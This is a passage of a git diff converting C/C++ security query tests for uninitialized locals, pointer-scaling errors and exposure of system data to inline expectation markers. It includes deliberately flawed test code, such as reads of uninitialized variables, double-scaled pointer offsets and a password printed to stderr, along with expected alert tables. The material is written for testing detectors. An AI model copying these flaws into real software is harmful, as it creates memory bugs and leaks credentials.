test.cpp:422:9:422:9 | definition of j | The variable $@ may not be initialized at this access. 
| test.cpp:422:9:422:9 | j | j | +| test.cpp:444:9:444:9 | j | test.cpp:439:9:439:9 | definition of j | test.cpp:439:9:439:9 | definition of j | The variable $@ may not be initialized at this access. | test.cpp:439:9:439:9 | j | j | +| test.cpp:462:2:462:2 | x | test.cpp:460:6:460:6 | definition of x | test.cpp:460:6:460:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:460:6:460:6 | x | x | +| test.cpp:468:7:468:7 | x | test.cpp:466:6:466:6 | definition of x | test.cpp:466:6:466:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:466:6:466:6 | x | x | +| test.cpp:475:2:475:2 | x | test.cpp:472:6:472:6 | definition of x | test.cpp:472:6:472:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:472:6:472:6 | x | x | +| test.cpp:482:7:482:7 | x | test.cpp:479:6:479:6 | definition of x | test.cpp:479:6:479:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:479:6:479:6 | x | x | edges nodes | errors.cpp:13:7:13:7 | definition of x | semmle.label | definition of x | 
@@ -14,18 +29,3 @@ nodes | test.cpp:466:6:466:6 | definition of x | semmle.label | definition of x | | test.cpp:472:6:472:6 | definition of x | semmle.label | definition of x | | test.cpp:479:6:479:6 | definition of x | semmle.label | definition of x | -#select -| errors.cpp:14:18:14:18 | x | errors.cpp:13:7:13:7 | definition of x | errors.cpp:13:7:13:7 | definition of x | The variable $@ may not be initialized at this access. | errors.cpp:13:7:13:7 | x | x | -| test.cpp:12:6:12:8 | foo | test.cpp:11:6:11:8 | definition of foo | test.cpp:11:6:11:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:11:6:11:8 | foo | foo | -| test.cpp:113:6:113:8 | foo | test.cpp:111:6:111:8 | definition of foo | test.cpp:111:6:111:8 | definition of foo | The variable $@ may not be initialized at this access. | test.cpp:111:6:111:8 | foo | foo | -| test.cpp:227:3:227:3 | x | test.cpp:226:7:226:7 | definition of x | test.cpp:226:7:226:7 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:226:7:226:7 | x | x | -| test.cpp:251:13:251:13 | i | test.cpp:249:6:249:6 | definition of i | test.cpp:249:6:249:6 | definition of i | The variable $@ may not be initialized at this access. | test.cpp:249:6:249:6 | i | i | -| test.cpp:344:10:344:10 | a | test.cpp:341:7:341:7 | definition of a | test.cpp:341:7:341:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:341:7:341:7 | a | a | -| test.cpp:377:10:377:10 | a | test.cpp:366:7:366:7 | definition of a | test.cpp:366:7:366:7 | definition of a | The variable $@ may not be initialized at this access. | test.cpp:366:7:366:7 | a | a | -| test.cpp:386:9:386:11 | val | test.cpp:367:6:367:8 | definition of val | test.cpp:367:6:367:8 | definition of val | The variable $@ may not be initialized at this access. 
| test.cpp:367:6:367:8 | val | val | -| test.cpp:425:10:425:10 | j | test.cpp:422:9:422:9 | definition of j | test.cpp:422:9:422:9 | definition of j | The variable $@ may not be initialized at this access. | test.cpp:422:9:422:9 | j | j | -| test.cpp:444:9:444:9 | j | test.cpp:439:9:439:9 | definition of j | test.cpp:439:9:439:9 | definition of j | The variable $@ may not be initialized at this access. | test.cpp:439:9:439:9 | j | j | -| test.cpp:462:2:462:2 | x | test.cpp:460:6:460:6 | definition of x | test.cpp:460:6:460:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:460:6:460:6 | x | x | -| test.cpp:468:7:468:7 | x | test.cpp:466:6:466:6 | definition of x | test.cpp:466:6:466:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:466:6:466:6 | x | x | -| test.cpp:475:2:475:2 | x | test.cpp:472:6:472:6 | definition of x | test.cpp:472:6:472:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:472:6:472:6 | x | x | -| test.cpp:482:7:482:7 | x | test.cpp:479:6:479:6 | definition of x | test.cpp:479:6:479:6 | definition of x | The variable $@ may not be initialized at this access. | test.cpp:479:6:479:6 | x | x | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.qlref index 834d9576ddc2..402ebbae6eb1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/UninitializedLocal.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/UninitializedLocal.ql +query: Likely Bugs/Memory Management/UninitializedLocal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/errors.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/errors.cpp index 07bb61f943ed..ae7e767158c5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/errors.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/errors.cpp @@ -10,6 +10,6 @@ void * operator new(unsigned long, bool); void operator delete(void*, bool); int f2() { - int x; - new(true) int (x); // BAD, ignore implicit error expression + int x; // $ Source Sink + new(true) int (x); // BAD, ignore implicit error expression // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/test.cpp index 14c00675545b..408781de438e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-457/semmle/tests/test.cpp @@ -8,8 +8,8 @@ void test1() { } void test2() { - int foo; - use(foo); // BAD + int foo; // $ Source Sink + use(foo); // BAD // $ Alert } void test3(bool b) { @@ -108,9 +108,9 @@ void test12() { } void test13() { - int foo; + int foo; // $ Source Sink &foo; - use(foo); // BAD + use(foo); // BAD // $ Alert } void init(int* p) { *p = 1; } @@ -223,8 +223,8 @@ void test19() { void test20() { - int x; - x += 0; // BAD + int x; // $ Source Sink + x += 0; // BAD // $ Alert use(x); } @@ -246,9 +246,9 @@ void test21() MyValue v1(1); MyValue v2; MyValue v3; - int i; + int i; // $ Source Sink - v3 = v1 >> i; // BAD: i is not initialized + v3 = v1 >> i; // BAD: i is not initialized // $ Alert v3 = v2 >> 1; // BAD: v2 is not initialized [NOT DETECTED] } @@ -338,10 +338,10 @@ int test28() { } int test29() { - bool a, b = true, c = true; + bool a, b = true, c = true; // $ Source Sink int val; - while ((a && b) || c) // BAD (a is uninitialized) + while ((a && b) || c) // BAD (a is uninitialized) // $ Alert { val = 1; b = false; 
@@ -363,8 +363,8 @@ int test30() { int test31() { bool loop = true; bool stop = false; - bool a, b = true, c = true; - int val; + bool a, b = true, c = true; // $ Source Sink + int val; // $ Source Sink while (loop || false) { @@ -374,7 +374,7 @@ int test31() { { stop = true; } - while ((a && b) || c) // BAD (a is uninitialized) + while ((a && b) || c) // BAD (a is uninitialized) // $ Alert { b = false; c = false; @@ -383,7 +383,7 @@ int test31() { { } while (false); - return val; // BAD + return val; // BAD // $ Alert } int test32() { @@ -419,10 +419,10 @@ int test34() { } int test35() { - int i, j; + int i, j; // $ Source Sink for (int i = 0; i < 10; i++, j = 1) { - return j; // BAD + return j; // BAD // $ Alert } } @@ -436,12 +436,12 @@ int test36() { } int test38() { - int i, j; + int i, j; // $ Source Sink for (int i = 0; false; i++, j = 1) { } - return j; // BAD + return j; // BAD // $ Alert } void test39() { @@ -457,29 +457,29 @@ void test40() { } void test41() { - int x; + int x; // $ Source Sink - x++; // BAD + x++; // BAD // $ Alert } void test42() { - int x; + int x; // $ Source Sink - void(x++); // BAD + void(x++); // BAD // $ Alert } void test43() { - int x; + int x; // $ Source Sink int y = 1; - x + y; // BAD + x + y; // BAD // $ Alert } void test44() { - int x; + int x; // $ Source Sink int y = 1; - void(x + y); // BAD + void(x + y); // BAD // $ Alert } enum class State { StateA, StateB, StateC }; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScaling.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScaling.qlref index 2a673380ba16..1c96d9e4607e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScaling.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScaling.qlref 
@@ -1 +1,2 @@
-Security/CWE/CWE-468/IncorrectPointerScaling.ql
\ No newline at end of file
+query: Security/CWE/CWE-468/IncorrectPointerScaling.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingChar.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingChar.qlref
index d14a9ca77f22..bc325696a764 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingChar.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingChar.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-468/IncorrectPointerScalingChar.ql
+query: Security/CWE/CWE-468/IncorrectPointerScalingChar.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingVoid.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingVoid.qlref
index 46650070ece4..1627ede63028 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingVoid.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/IncorrectPointerScalingVoid.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-468/IncorrectPointerScalingVoid.ql
+query: Security/CWE/CWE-468/IncorrectPointerScalingVoid.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/test.cpp
index a4d42f4521f2..9f6b046a90bd 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/test.cpp
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/IncorrectPointerScaling/test.cpp
@@ -10,7 +10,7 @@ int test2(int i) { char *charPointer = (char *)intArray; // BAD [FALSE NEGATIVE of IncorrectPointerScaling.ql]: the pointer arithmetic // uses type char*, so the offset is not scaled by sizeof(int). - return *(int *)(charPointer + i); + return *(int *)(charPointer + i); // $ Alert[cpp/incorrect-pointer-scaling-char] } int test3(int i) { @@ -47,7 +47,7 @@ char* test7( int *p = (int*)x; // BAD: the type of x is double*, but it has been cast to int* // so the pointer add is scaled by sizeof(int). - return (char *)(p + 1); + return (char *)(p + 1); // $ Alert[cpp/suspicious-pointer-scaling] } char* test8( @@ -74,7 +74,7 @@ char* test10(int* x) { // only part of an integer is architecture-dependent. If the pointer returned // from this function is dereferenced, the result will depend on int size and // endianness regardless of whether the offset is scaled by sizeof(int). - return (char*)x + 1; + return (char*)x + 1; // $ Alert[cpp/incorrect-pointer-scaling-char] } char* test10b(int* x) { @@ -91,7 +91,7 @@ short* test10c(int* x) { // from this function is dereferenced, the result will depend on int size and // endianness regardless of whether the offset is scaled by (sizeof(int) / // sizeof(short)). - return (short*)x + 1; + return (short*)x + 1; // $ Alert[cpp/suspicious-pointer-scaling] } int test11(int* x, int* y) { @@ -116,7 +116,7 @@ int test13(mystruct *p) { // computes the byte offset of a member. Code like this is commonly seen in // projects that use C/C++ for their low-level control over memory. int offset = (char *)&p->int_field - (char *)p; - return *(int *)((char*)p + offset); + return *(int *)((char*)p + offset); // $ Alert[cpp/incorrect-pointer-scaling-char] } int test14(int arr[12][12]) { 
@@ -127,22 +127,22 @@ int test14(int arr[12][12]) { int test15(int arr[12][12]) { // BAD: the type of the pointer is int but it has been scaled by sizeof(short) - return *(int*)((short*) arr + 1); + return *(int*)((short*) arr + 1); // $ Alert[cpp/suspicious-pointer-scaling] } void* test16(int* x) { // BAD: void pointer arithmetic is not portable across compilers - return (void*)x + 1; + return (void*)x + 1; // $ Alert[cpp/suspicious-pointer-scaling-void] } void* test17(int* x) { // BAD: void pointer arithmetic is not portable across compilers - return (void*)x + sizeof(int); + return (void*)x + sizeof(int); // $ Alert[cpp/suspicious-pointer-scaling-void] } int test18(int i) { int intArray[2][2] = { {1, 2}, {3, 4} }; char *charPointer = (char *)intArray; // BAD: the pointer arithmetic uses type char*, so the offset is not scaled by sizeof(int). - return *(int *)(charPointer + i); + return *(int *)(charPointer + i); // $ Alert[cpp/incorrect-pointer-scaling-char] } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/SuspiciousAddWithSizeof.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/SuspiciousAddWithSizeof.qlref index 8c2dec10e170..bcea0a075987 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/SuspiciousAddWithSizeof.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/SuspiciousAddWithSizeof.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-468/SuspiciousAddWithSizeof.ql \ No newline at end of file +query: Security/CWE/CWE-468/SuspiciousAddWithSizeof.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/buildless.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/buildless.cpp index b0b590fba699..bcc4400b293e 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/buildless.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/buildless.cpp @@ -2,8 +2,8 @@ void test_buildless(const char *p_c, const short *p_short, const int *p_int, const uint8_t *p_8, const uint16_t *p_16, const uint32_t *p_32) { *(p_c + sizeof(int)); // GOOD (`sizeof(char)` is 1) - *(p_short + sizeof(int)); // BAD - *(p_int + sizeof(int)); // BAD + *(p_short + sizeof(int)); // BAD // $ Alert + *(p_int + sizeof(int)); // BAD // $ Alert *(p_8 + sizeof(int)); // GOOD (`sizeof(uint8_t)` is 1, but there's an error in the type) *(p_16 + sizeof(int)); // BAD [NOT DETECTED] *(p_32 + sizeof(int)); // BAD [NOT DETECTED] diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/test.cpp index fa2bd934cca2..11073db5d6df 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-468/semmle/SuspiciousAddWithSizeof/test.cpp @@ -3,7 +3,7 @@ int test1(int i) { int *intPointer = intArray; // BAD: the offset is already automatically scaled by sizeof(int), // so this code will compute the wrong offset. - return *(intPointer + (i * sizeof(int))); + return *(intPointer + (i * sizeof(int))); // $ Alert } int test2(int i) { @@ -11,7 +11,7 @@ int test2(int i) { int *intPointer = intArray; // BAD: the offset is already automatically scaled by sizeof(int), // so this code will compute the wrong offset. - return *(intPointer - (i * sizeof(int))); + return *(intPointer - (i * sizeof(int))); // $ Alert } int test3(int i) { 
@@ -19,7 +19,7 @@ int test3(int i) { int *intPointer = intArray; // BAD: the offset is already automatically scaled by sizeof(int), // so this code will compute the wrong offset. - return *(intPointer + sizeof(int)); + return *(intPointer + sizeof(int)); // $ Alert } int test4(int i) { @@ -27,7 +27,7 @@ int test4(int i) { int *intPointer = intArray; // BAD: the offset is already automatically scaled by sizeof(int), // so this code will compute the wrong offset. - return *(intPointer - sizeof(int)); + return *(intPointer - sizeof(int)); // $ Alert } int test5(int i, int j) { @@ -35,7 +35,7 @@ int test5(int i, int j) { int *intPointer = intArray; // BAD: the offset is already automatically scaled by sizeof(int), // so this code will compute the wrong offset. - return *(intPointer + (i * sizeof(int) * j)); + return *(intPointer + (i * sizeof(int) * j)); // $ Alert } void test6(int i) { @@ -58,7 +58,7 @@ void test7(int i) { int v; v = *(intPointer + i); // GOOD - v = *(intPointer + (i * sizeof(int))); // BAD: scaled twice by sizeof(int) + v = *(intPointer + (i * sizeof(int))); // BAD: scaled twice by sizeof(int) // $ Alert v = *(charPointer + i); // GOOD (actually rather dubious, but this could be correct code) v = *(charPointer + (i * sizeof(int))); // GOOD v = *(int *)(voidPointer + i); // GOOD (actually rather dubious, but this could be correct code) @@ -86,7 +86,7 @@ class MyTest8Class myIntsPointer((myInt *)malloc(sizeof(MyABC) * 2)) { myChar *secondPtr = myCharsPointer + sizeof(MyABC); // GOOD - myInt *secondPtrInt = myIntsPointer + sizeof(MyABC); // BAD + myInt *secondPtrInt = myIntsPointer + sizeof(MyABC); // BAD // $ Alert } private: diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected index e217064d1dfc..58f42bec0c84 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.expected @@ -1,4 +1,4 @@ +#select edges nodes subpaths -#select diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.qlref index 0c88835bf1fc..0cb5a0a34d75 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/ExposedSystemData.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-497/ExposedSystemData.ql \ No newline at end of file +query: Security/CWE/CWE-497/ExposedSystemData.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected index 3fc58925ff7b..62c2ad7896b4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.expected @@ -1,8 +1,8 @@ +#select +| tests.c:70:70:70:77 | *password | tests.c:57:21:57:28 | *password | tests.c:70:70:70:77 | *password | This operation potentially exposes sensitive system data from $@. | tests.c:57:21:57:28 | *password | *password | edges | tests.c:57:21:57:28 | *password | tests.c:70:70:70:77 | *password | provenance | | nodes | tests.c:57:21:57:28 | *password | semmle.label | *password | | tests.c:70:70:70:77 | *password | semmle.label | *password | subpaths -#select -| tests.c:70:70:70:77 | *password | tests.c:57:21:57:28 | *password | tests.c:70:70:70:77 | *password | This operation potentially exposes sensitive system data from $@. | tests.c:57:21:57:28 | *password | *password | 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.qlref index 4f7305ce6970..fd804eefffa8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-497/PotentiallyExposedSystemData.ql \ No newline at end of file +query: Security/CWE/CWE-497/PotentiallyExposedSystemData.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/tests.c b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/tests.c index 4b1df2a96e1d..b12215c1cb7c 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/tests.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/tests.c @@ -54,7 +54,7 @@ void CWE535_Info_Exposure_Shell_Error__w32_char_01_bad() if (LogonUserA( username, domain, - password, + password, // $ Source[cpp/potential-system-data-exposure] LOGON32_LOGON_NETWORK, LOGON32_PROVIDER_DEFAULT, &pHandle) != 0) @@ -67,6 +67,6 @@ void CWE535_Info_Exposure_Shell_Error__w32_char_01_bad() printLine("Unable to login."); } /* FLAW: Write sensitive data to stderr */ - fprintf(stderr, "User attempted access with password: %s\n", password); + fprintf(stderr, "User attempted access with password: %s\n", password); // $ Alert[cpp/potential-system-data-exposure] } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected index 9756dde70dd3..e678961de2e8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected 
@@ -1,3 +1,21 @@ +#select +| tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:48:15:48:36 | *call to getenv | *call to getenv | +| tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:49:15:49:36 | *call to getenv | *call to getenv | +| tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:50:15:50:36 | *call to getenv | *call to getenv | +| tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:57:18:57:39 | *call to getenv | *call to getenv | +| tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:58:41:58:62 | *call to getenv | *call to getenv | +| tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:59:43:59:64 | *call to getenv | *call to getenv | +| tests.cpp:71:27:71:38 | *global_token | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:71:27:71:38 | *global_token | This operation potentially exposes sensitive system data from $@. | tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | +| tests.cpp:73:27:73:31 | *maybe | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:73:27:73:31 | *maybe | This operation potentially exposes sensitive system data from $@. 
| tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | +| tests.cpp:88:15:88:17 | *msg | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:88:15:88:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | +| tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | +| tests.cpp:111:15:111:17 | *tmp | tests.cpp:131:14:131:35 | *call to getenv | tests.cpp:111:15:111:17 | *tmp | This operation potentially exposes sensitive system data from $@. | tests.cpp:131:14:131:35 | *call to getenv | *call to getenv | +| tests.cpp:119:7:119:12 | *buffer | tests.cpp:132:14:132:35 | *call to getenv | tests.cpp:119:7:119:12 | *buffer | This operation potentially exposes sensitive system data from $@. | tests.cpp:132:14:132:35 | *call to getenv | *call to getenv | +| tests.cpp:124:15:124:17 | *msg | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:124:15:124:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | +| tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | +| tests.cpp:141:15:141:20 | *secret | tests.cpp:139:17:139:22 | *call to getenv | tests.cpp:141:15:141:20 | *secret | This operation potentially exposes sensitive system data from $@. | tests.cpp:139:17:139:22 | *call to getenv | *call to getenv | +| tests_passwd.cpp:18:29:18:31 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:18:29:18:31 | *pwd | This operation potentially exposes sensitive system data from $@. 
| tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | +| tests_passwd.cpp:19:26:19:28 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:19:26:19:28 | *pwd | This operation potentially exposes sensitive system data from $@. | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | edges | tests.cpp:62:7:62:18 | **global_token | tests.cpp:62:7:62:18 | **global_token | provenance | | | tests.cpp:62:7:62:18 | **global_token | tests.cpp:69:2:69:43 | *... = ... | provenance | | 
@@ -55,21 +73,3 @@ nodes | tests_passwd.cpp:18:29:18:31 | *pwd | semmle.label | *pwd | | tests_passwd.cpp:19:26:19:28 | *pwd | semmle.label | *pwd | subpaths -#select -| tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:48:15:48:36 | *call to getenv | *call to getenv | -| tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:49:15:49:36 | *call to getenv | *call to getenv | -| tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:50:15:50:36 | *call to getenv | *call to getenv | -| tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:57:18:57:39 | *call to getenv | *call to getenv | -| tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:58:41:58:62 | *call to getenv | *call to getenv | -| tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:59:43:59:64 | *call to getenv | *call to getenv | -| tests.cpp:71:27:71:38 | *global_token | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:71:27:71:38 | *global_token | This operation potentially exposes sensitive system data from $@. 
| tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | -| tests.cpp:73:27:73:31 | *maybe | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:73:27:73:31 | *maybe | This operation potentially exposes sensitive system data from $@. | tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | -| tests.cpp:88:15:88:17 | *msg | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:88:15:88:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | -| tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | -| tests.cpp:111:15:111:17 | *tmp | tests.cpp:131:14:131:35 | *call to getenv | tests.cpp:111:15:111:17 | *tmp | This operation potentially exposes sensitive system data from $@. | tests.cpp:131:14:131:35 | *call to getenv | *call to getenv | -| tests.cpp:119:7:119:12 | *buffer | tests.cpp:132:14:132:35 | *call to getenv | tests.cpp:119:7:119:12 | *buffer | This operation potentially exposes sensitive system data from $@. | tests.cpp:132:14:132:35 | *call to getenv | *call to getenv | -| tests.cpp:124:15:124:17 | *msg | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:124:15:124:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | -| tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | 